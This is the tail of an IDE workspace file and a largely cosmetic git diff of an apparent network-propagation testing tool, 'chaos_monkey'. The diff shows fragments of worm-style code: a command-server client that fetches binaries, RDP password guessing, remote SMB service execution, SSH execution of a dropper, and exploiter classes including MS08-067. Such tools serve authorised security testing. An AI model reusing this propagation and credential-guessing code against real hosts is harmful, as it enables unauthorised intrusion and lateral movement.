<caret line="36" column="19" selection-start-line="36" selection-start-column="9" selection-end-line="36" selection-end-column="19" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/monkey-linux.spec">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-2.840909">
<caret line="5" column="22" selection-start-line="5" selection-start-column="20" selection-end-line="5" selection-end-column="22" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/monkey_island/cc/main.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/monkey_island/run_cc.bat">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
</state>
</provider>
</entry>
<entry file="file://$USER_HOME$/.PyCharm50/system/python_stubs/-762174762/__builtin__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="568" column="4" selection-start-line="568" selection-start-column="4" selection-end-line="568" selection-end-column="4" />
</state>
</provider>
</entry>
<entry file="file://C:/Python27/Lib/difflib.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.3330292">
<caret line="700" column="4" selection-start-line="700" selection-start-column="4" selection-end-line="700" selection-end-column="4" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/system_singleton.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="108" column="0" selection-start-line="108" selection-start-column="0" selection-end-line="108" selection-end-column="0" />
<folding>
<element signature="e#0#10#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/monkey.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-17.931034">
<caret line="178" column="0" selection-start-line="178" selection-start-column="0" selection-end-line="178" selection-end-column="0" />
<folding>
<element signature="e#0#10#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/monkeyfs.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="60" column="0" selection-start-line="60" selection-start-column="0" selection-end-line="60" selection-end-column="0" />
<folding>
<element signature="e#0#22#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/tunnel.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="109" column="0" selection-start-line="109" selection-start-column="0" selection-end-line="109" selection-end-column="0" />
<folding>
<element signature="e#0#13#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/main.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="111" column="0" selection-start-line="111" selection-start-column="0" selection-end-line="111" selection-end-column="0" />
<folding>
<element signature="e#0#9#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/dropper.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="-15.24138">
<caret line="26" column="0" selection-start-line="26" selection-start-column="0" selection-end-line="26" selection-end-column="0" />
<folding>
<element signature="e#0#9#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/control.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="15" column="0" selection-start-line="15" selection-start-column="0" selection-end-line="15" selection-end-column="0" />
<folding>
<element signature="e#0#11#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/config.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding>
<element signature="e#0#9#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/build_linux.sh">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/transport/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="4" column="0" selection-start-line="4" selection-start-column="0" selection-end-line="4" selection-end-column="0" />
<folding>
<element signature="e#0#25#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/transport/base.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="15" column="0" selection-start-line="15" selection-start-column="0" selection-end-line="15" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/transport/ftp.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="174" column="0" selection-start-line="174" selection-start-column="0" selection-end-line="174" selection-end-column="0" />
<folding>
<element signature="e#0#30#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/transport/http.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding>
<element signature="e#0#49#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/transport/tcp.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="13" column="29" selection-start-line="13" selection-start-column="29" selection-end-line="13" selection-end-column="29" />
<folding>
<element signature="e#0#13#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="1" column="0" selection-start-line="1" selection-start-column="0" selection-end-line="1" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/firewall.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="3" column="0" selection-start-line="3" selection-start-column="0" selection-end-line="3" selection-end-column="0" />
<folding>
<element signature="e#0#17#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="25" column="0" selection-start-line="25" selection-start-column="0" selection-end-line="25" selection-end-column="0" />
<folding>
<element signature="e#0#39#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/network_scanner.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="18" column="0" selection-start-line="18" selection-start-column="0" selection-end-line="18" selection-end-column="0" />
<folding>
<element signature="e#0#11#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/info.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="56" column="20" selection-start-line="56" selection-start-column="20" selection-end-line="56" selection-end-column="20" />
<folding>
<element signature="e#0#10#0" expanded="false" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/ping_scanner.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="30" column="22" selection-start-line="30" selection-start-column="22" selection-end-line="30" selection-end-column="22" />
<folding>
<element signature="e#0#9#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/range.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="65" column="0" selection-start-line="65" selection-start-column="0" selection-end-line="65" selection-end-column="0" />
<folding>
<element signature="e#0#13#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/smbfinger.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding>
<element signature="e#0#13#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/sshfinger.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="24" column="33" selection-start-line="24" selection-start-column="33" selection-end-line="24" selection-end-column="33" />
<folding>
<element signature="e#0#9#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/tcp_scanner.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding>
<element signature="e#0#11#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/tools.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding>
<element signature="e#0#13#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/model/host.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="38" column="0" selection-start-line="38" selection-start-column="0" selection-end-line="38" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/model/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="14" column="0" selection-start-line="14" selection-start-column="0" selection-end-line="14" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="6" column="0" selection-start-line="6" selection-start-column="0" selection-end-line="6" selection-end-column="0" />
<folding>
<element signature="e#0#39#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://C:/Python27/Lib/site-packages/rdpy/core/error.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="2.4323077">
<caret line="93" column="6" selection-start-line="93" selection-start-column="6" selection-end-line="93" selection-end-column="6" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/rdpgrinder.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="94" column="36" selection-start-line="94" selection-start-column="36" selection-end-line="94" selection-end-column="36" />
<folding>
<element signature="e#0#11#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/smbexec.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding>
<element signature="e#0#10#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/sshexec.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="126" column="21" selection-start-line="126" selection-start-column="21" selection-end-line="126" selection-end-column="21" />
<folding>
<element signature="e#0#15#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://C:/Python27/Lib/site-packages/impacket/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/tools.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="26" column="0" selection-start-line="26" selection-start-column="0" selection-end-line="26" selection-end-column="0" />
<folding>
<element signature="e#0#9#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/win_ms08_067.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="264" column="16" selection-start-line="264" selection-start-column="16" selection-end-line="264" selection-end-column="16" />
<folding>
<element signature="e#330#340#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/wmiexec.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="109" column="0" selection-start-line="109" selection-start-column="0" selection-end-line="109" selection-end-column="0" />
<folding>
<element signature="e#0#13#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/build_windows.bat">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.05230769">
<caret line="2" column="0" selection-start-line="2" selection-start-column="0" selection-end-line="2" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
</component>
</project>

5
chaos_monkey/config.py
View File

@ -1,13 +1,12 @@
import os import os
import sys import sys
import ntpath from network.range import FixedRange
from network.range import ClassCRange, RelativeRange, FixedRange
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger from network import TcpScanner, PingScanner, SMBFinger, SSHFinger
from abc import ABCMeta from abc import ABCMeta
import uuid import uuid
import types import types
__author__ = 'itamar' __author__ = 'itamar'
GUID = str(uuid.getnode()) GUID = str(uuid.getnode())

48
chaos_monkey/control.py
View File

@ -1,13 +1,11 @@
import json import json
import random
import logging import logging
import requests import requests
import platform import platform
import monkeyfs import monkeyfs
from network.info import local_ips from network.info import local_ips
from socket import gethostname, gethostbyname_ex from socket import gethostname
from config import WormConfiguration, Configuration, GUID from config import WormConfiguration, GUID
from transport.tcp import TcpProxy from transport.tcp import TcpProxy
from transport.http import HTTPConnectProxy from transport.http import HTTPConnectProxy
import tunnel import tunnel
@ -19,6 +17,7 @@ requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
DOWNLOAD_CHUNK = 1024 DOWNLOAD_CHUNK = 1024
class ControlClient(object): class ControlClient(object):
proxies = {} proxies = {}
@ -32,13 +31,12 @@ class ControlClient(object):
WormConfiguration.current_server = server WormConfiguration.current_server = server
monkey = { 'guid': GUID, monkey = {'guid': GUID,
'hostname' : hostname, 'hostname': hostname,
'ip_addresses' : local_ips(), 'ip_addresses': local_ips(),
'description' : " ".join(platform.uname()), 'description': " ".join(platform.uname()),
'config' : WormConfiguration.as_dict(), 'config': WormConfiguration.as_dict(),
'parent' : parent, 'parent': parent}
}
if ControlClient.proxies: if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https') monkey['tunnel'] = ControlClient.proxies.get('https')
@ -76,10 +74,10 @@ class ControlClient(object):
if ControlClient.proxies: if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https') monkey['tunnel'] = ControlClient.proxies.get('https')
reply = requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), reply = requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),
data=json.dumps(monkey), data=json.dumps(monkey),
headers={'content-type' : 'application/json'}, headers={'content-type' : 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception, exc: except Exception, exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warn("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
@ -92,11 +90,10 @@ class ControlClient(object):
try: try:
telemetry = {'monkey_guid': GUID, 'telem_type': tele_type, 'data' : data} telemetry = {'monkey_guid': GUID, 'telem_type': tele_type, 'data' : data}
reply = requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), reply = requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,),
data=json.dumps(telemetry), data=json.dumps(telemetry),
headers={'content-type' : 'application/json'}, headers={'content-type' : 'application/json'},
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception, exc: except Exception, exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warn("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc) WormConfiguration.current_server, exc)
@ -107,8 +104,8 @@ class ControlClient(object):
return return
try: try:
reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
except Exception, exc: except Exception, exc:
LOG.warn("Error connecting to control server %s: %s", LOG.warn("Error connecting to control server %s: %s",
@ -141,7 +138,8 @@ class ControlClient(object):
if monkeyfs.isfile(dest_file) and size == monkeyfs.getsize(dest_file): if monkeyfs.isfile(dest_file) and size == monkeyfs.getsize(dest_file):
return dest_file return dest_file
else: else:
download = requests.get("https://%s/api/monkey/download/%s" % (WormConfiguration.current_server, filename), download = requests.get("https://%s/api/monkey/download/%s" %
(WormConfiguration.current_server, filename),
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
@ -159,7 +157,6 @@ class ControlClient(object):
return None return None
@staticmethod @staticmethod
def create_control_tunnel(): def create_control_tunnel():
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
@ -178,6 +175,3 @@ class ControlClient(object):
target_addr, target_port = None, None target_addr, target_port = None, None
return tunnel.MonkeyTunnel(proxy_class, target_addr=target_addr, target_port=target_port) return tunnel.MonkeyTunnel(proxy_class, target_addr=target_addr, target_port=target_port)

12
chaos_monkey/dropper.py
View File

@ -1,4 +1,3 @@
import os import os
import sys import sys
import time import time
@ -8,7 +7,6 @@ import pprint
import logging import logging
import subprocess import subprocess
from ctypes import c_char_p from ctypes import c_char_p
from control import ControlClient
from model import MONKEY_CMDLINE from model import MONKEY_CMDLINE
from config import WormConfiguration from config import WormConfiguration
@ -26,14 +24,7 @@ MOVEFILE_DELAY_UNTIL_REBOOT = 4
class MonkeyDrops(object): class MonkeyDrops(object):
def __init__(self, args): def __init__(self, args):
if args:
dest_path = os.path.expandvars(args[0])
else:
dest_path = os.path.expandvars(WormConfiguration.dropper_target_path if sys.platform == "win32" \
else WormConfiguration.dropper_target_path_linux)
self._monkey_args = args[1:] self._monkey_args = args[1:]
self._config = {'source_path': os.path.abspath(sys.argv[0]), self._config = {'source_path': os.path.abspath(sys.argv[0]),
'destination_path': args[0]} 'destination_path': args[0]}
@ -112,8 +103,7 @@ class MonkeyDrops(object):
try: try:
os.remove(self._config['source_path']) os.remove(self._config['source_path'])
except Exception, exc: except Exception, exc:
LOG.debug("Error removing source file '%s': %s", LOG.debug("Error removing source file '%s': %s", self._config['source_path'], exc)
self._config['source_path'], exc)
# mark the file for removal on next boot # mark the file for removal on next boot
dropper_source_path_ctypes = c_char_p(self._config['source_path']) dropper_source_path_ctypes = c_char_p(self._config['source_path'])

14
chaos_monkey/exploit/__init__.py
View File

@ -1,20 +1,20 @@
from abc import ABCMeta, abstractmethod from abc import ABCMeta, abstractmethod
from win_ms08_067 import Ms08_067_Exploiter
from wmiexec import WmiExploiter
from smbexec import SmbExploiter
from rdpgrinder import RdpExploiter
from sshexec import SSHExploiter
__author__ = 'itamar' __author__ = 'itamar'
class HostExploiter(object): class HostExploiter(object):
__metaclass__ = ABCMeta __metaclass__ = ABCMeta
_target_os_type = [] _target_os_type = []
def is_os_supported(self, host): def is_os_supported(self, host):
return host.os.get('type') in self._target_os_type return host.os.get('type') in self._target_os_type
@abstractmethod @abstractmethod
def exploit_host(self, host, src_path=None): def exploit_host(self, host, src_path=None):
raise NotImplementedError() raise NotImplementedError()
from win_ms08_067 import Ms08_067_Exploiter
from wmiexec import WmiExploiter
from smbexec import SmbExploiter
from rdpgrinder import RdpExploiter
from sshexec import SSHExploiter

37
chaos_monkey/exploit/rdpgrinder.py
View File

@ -1,7 +1,5 @@
import time import time
import socket
import threading import threading
import cffi
import os.path import os.path
import twisted.python.log import twisted.python.log
import rdpy.core.log as rdpy_log import rdpy.core.log as rdpy_log
@ -9,12 +7,12 @@ from rdpy.protocol.rdp import rdp
from twisted.internet import reactor from twisted.internet import reactor
from rdpy.core.error import RDPSecurityNegoFail from rdpy.core.error import RDPSecurityNegoFail
from logging import getLogger from logging import getLogger
from exploit import HostExploiter from chaos_monkey.exploit import HostExploiter
from exploit.tools import HTTPTools from chaos_monkey.exploit.tools import HTTPTools
from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS from chaos_monkey.model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from model.host import VictimHost from chaos_monkey.model.host import VictimHost
from network.tools import check_port_tcp from chaos_monkey.network.tools import check_port_tcp
from exploit.tools import get_target_monkey from chaos_monkey.exploit.tools import get_target_monkey
__author__ = 'hoffer' __author__ = 'hoffer'
KEYS_INTERVAL = 0.1 KEYS_INTERVAL = 0.1
@ -24,6 +22,7 @@ DOWNLOAD_TIMEOUT = 60
RDP_PORT = 3389 RDP_PORT = 3389
LOG = getLogger(__name__) LOG = getLogger(__name__)
def twisted_log_func(*message, **kw): def twisted_log_func(*message, **kw):
if kw.has_key('isError') and kw['isError']: if kw.has_key('isError') and kw['isError']:
error_msg = 'Unknown' error_msg = 'Unknown'
@ -33,6 +32,7 @@ def twisted_log_func(*message, **kw):
else: else:
LOG.debug("Message from twisted library: %s" % (str(message),)) LOG.debug("Message from twisted library: %s" % (str(message),))
def rdpy_log_func(message): def rdpy_log_func(message):
LOG.debug("Message from rdpy library: %s" % (message,)) LOG.debug("Message from rdpy library: %s" % (message,))
@ -44,26 +44,31 @@ rdpy_log.log = rdpy_log_func
global g_reactor global g_reactor
g_reactor = threading.Thread(target=reactor.run, args=(False,)) g_reactor = threading.Thread(target=reactor.run, args=(False,))
class ScanCodeEvent(object): class ScanCodeEvent(object):
def __init__(self, code, is_pressed=False, is_special=False): def __init__(self, code, is_pressed=False, is_special=False):
self.code = code self.code = code
self.is_pressed = is_pressed self.is_pressed = is_pressed
self.is_special = is_special self.is_special = is_special
class CharEvent(object): class CharEvent(object):
def __init__(self, char, is_pressed=False): def __init__(self, char, is_pressed=False):
self.char = char self.char = char
self.is_pressed = is_pressed self.is_pressed = is_pressed
class SleepEvent(object): class SleepEvent(object):
def __init__(self, interval): def __init__(self, interval):
self.interval= interval self.interval= interval
class WaitUpdateEvent(object): class WaitUpdateEvent(object):
def __init__(self, updates=1): def __init__(self, updates=1):
self.updates = updates self.updates = updates
pass pass
def str_to_keys(orig_str): def str_to_keys(orig_str):
result = [] result = []
for c in orig_str: for c in orig_str:
@ -72,6 +77,7 @@ def str_to_keys(orig_str):
result.append(WaitUpdateEvent()) result.append(WaitUpdateEvent())
return result return result
class KeyPressRDPClient(rdp.RDPClientObserver): class KeyPressRDPClient(rdp.RDPClientObserver):
def __init__(self, controller, keys, width, height, addr): def __init__(self, controller, keys, width, height, addr):
super(KeyPressRDPClient, self).__init__(controller) super(KeyPressRDPClient, self).__init__(controller)
@ -86,6 +92,7 @@ class KeyPressRDPClient(rdp.RDPClientObserver):
self._last_update = 0 self._last_update = 0
self.closed = False self.closed = False
self.success = False self.success = False
self._wait_for_update = None
def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data): def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
update_time = time.time() update_time = time.time()
@ -130,7 +137,6 @@ class KeyPressRDPClient(rdp.RDPClientObserver):
self._update_lock.release() self._update_lock.release()
time.sleep(KEYS_SENDER_SLEEP) time.sleep(KEYS_SENDER_SLEEP)
def onReady(self): def onReady(self):
pass pass
@ -175,7 +181,7 @@ class CMDClientFactory(rdp.ClientFactory):
@return: RDPClientQt @return: RDPClientQt
""" """
#create client observer # create client observer
self._client = KeyPressRDPClient(controller, self._keys, self._width, self._height, addr) self._client = KeyPressRDPClient(controller, self._keys, self._width, self._height, addr)
controller.setUsername(self._username) controller.setUsername(self._username)
@ -190,10 +196,10 @@ class CMDClientFactory(rdp.ClientFactory):
return self._client return self._client
def clientConnectionLost(self, connector, reason): def clientConnectionLost(self, connector, reason):
#try reconnect with basic RDP security # try reconnect with basic RDP security
if reason.type == RDPSecurityNegoFail and self._nego: if reason.type == RDPSecurityNegoFail and self._nego:
LOG.debug("RDP Security negotiate failed on %s:%s, starting retry with basic security" % (connector.host, connector.port)) LOG.debug("RDP Security negotiate failed on %s:%s, starting retry with basic security" % (connector.host, connector.port))
#stop nego # stop nego
self._nego = False self._nego = False
self._security = rdp.SecurityLevel.RDP_LEVEL_RDP self._security = rdp.SecurityLevel.RDP_LEVEL_RDP
connector.connect() connector.connect()
@ -208,6 +214,7 @@ class CMDClientFactory(rdp.ClientFactory):
self.success = False self.success = False
self.done_event.set() self.done_event.set()
class RdpExploiter(HostExploiter): class RdpExploiter(HostExploiter):
_target_os_type = ['windows'] _target_os_type = ['windows']
@ -267,10 +274,8 @@ class RdpExploiter(HostExploiter):
for password in passwords: for password in passwords:
try: try:
# run command using rdp. # run command using rdp.
LOG.info("Trying rdp logging into victim %r with user %s and password '%s'",
LOG.info("Trying rdp logging into victim %r with user" host, self._config.psexec_user, password)
" %s and password '%s'", host,
self._config.psexec_user, password)
client_factory = CMDClientFactory(self._config.psexec_user, password, "", command) client_factory = CMDClientFactory(self._config.psexec_user, password, "", command)

15
chaos_monkey/exploit/smbexec.py
View File

@ -1,11 +1,11 @@
import sys import sys
from logging import getLogger from logging import getLogger
from model.host import VictimHost from chaos_monkey.model.host import VictimHost
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED from chaos_monkey.model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
from exploit import HostExploiter from chaos_monkey.exploit import HostExploiter
from network.tools import check_port_tcp from chaos_monkey.network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey from chaos_monkey.exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger from chaos_monkey.network import SMBFinger
try: try:
from impacket import smb from impacket import smb
@ -25,6 +25,7 @@ except ImportError, exc:
LOG = getLogger(__name__) LOG = getLogger(__name__)
class SmbExploiter(HostExploiter): class SmbExploiter(HostExploiter):
_target_os_type = ['windows'] _target_os_type = ['windows']
@ -142,7 +143,7 @@ class SmbExploiter(HostExploiter):
try: try:
scmr.hRStartServiceW(scmr_rpc, service) scmr.hRStartServiceW(scmr_rpc, service)
except: except:
pass pass
scmr.hRDeleteService(scmr_rpc, service) scmr.hRDeleteService(scmr_rpc, service)
scmr.hRCloseServiceHandle(scmr_rpc, service) scmr.hRCloseServiceHandle(scmr_rpc, service)

16
chaos_monkey/exploit/sshexec.py
View File

@ -1,11 +1,10 @@
import os
import paramiko import paramiko
import monkeyfs from chaos_monkey import monkeyfs
import logging import logging
from exploit import HostExploiter from chaos_monkey.exploit import HostExploiter
from model import MONKEY_ARG from chaos_monkey.model import MONKEY_ARG
from exploit.tools import get_target_monkey from chaos_monkey.exploit.tools import get_target_monkey
from network.tools import check_port_tcp from chaos_monkey.network.tools import check_port_tcp
import time import time
__author__ = 'hoffer' __author__ = 'hoffer'
@ -14,6 +13,7 @@ LOG = logging.getLogger(__name__)
SSH_PORT = 22 SSH_PORT = 22
TRANSFER_UPDATE_RATE = 15 TRANSFER_UPDATE_RATE = 15
class SSHExploiter(HostExploiter): class SSHExploiter(HostExploiter):
_target_os_type = ['linux', None] _target_os_type = ['linux', None]
@ -32,7 +32,7 @@ class SSHExploiter(HostExploiter):
port = SSH_PORT port = SSH_PORT
# if ssh banner found on different port, use that port. # if ssh banner found on different port, use that port.
for servkey,servdata in host.services.items(): for servkey, servdata in host.services.items():
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'): if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-','')) port = int(servkey.replace('tcp-',''))
@ -124,7 +124,7 @@ class SSHExploiter(HostExploiter):
ssh.exec_command(cmdline) ssh.exec_command(cmdline)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, host, cmdline) self._config.dropper_target_path_linux, host, cmdline)
ssh.close() ssh.close()
return True return True

13
chaos_monkey/exploit/tools.py
View File

@ -1,17 +1,15 @@
import os import os
import ntpath import ntpath
import pprint import pprint
import logging import logging
import os.path import os.path
import socket
import urllib import urllib
import monkeyfs from chaos_monkey import monkeyfs
from difflib import get_close_matches from difflib import get_close_matches
from network import local_ips from chaos_monkey.network import local_ips
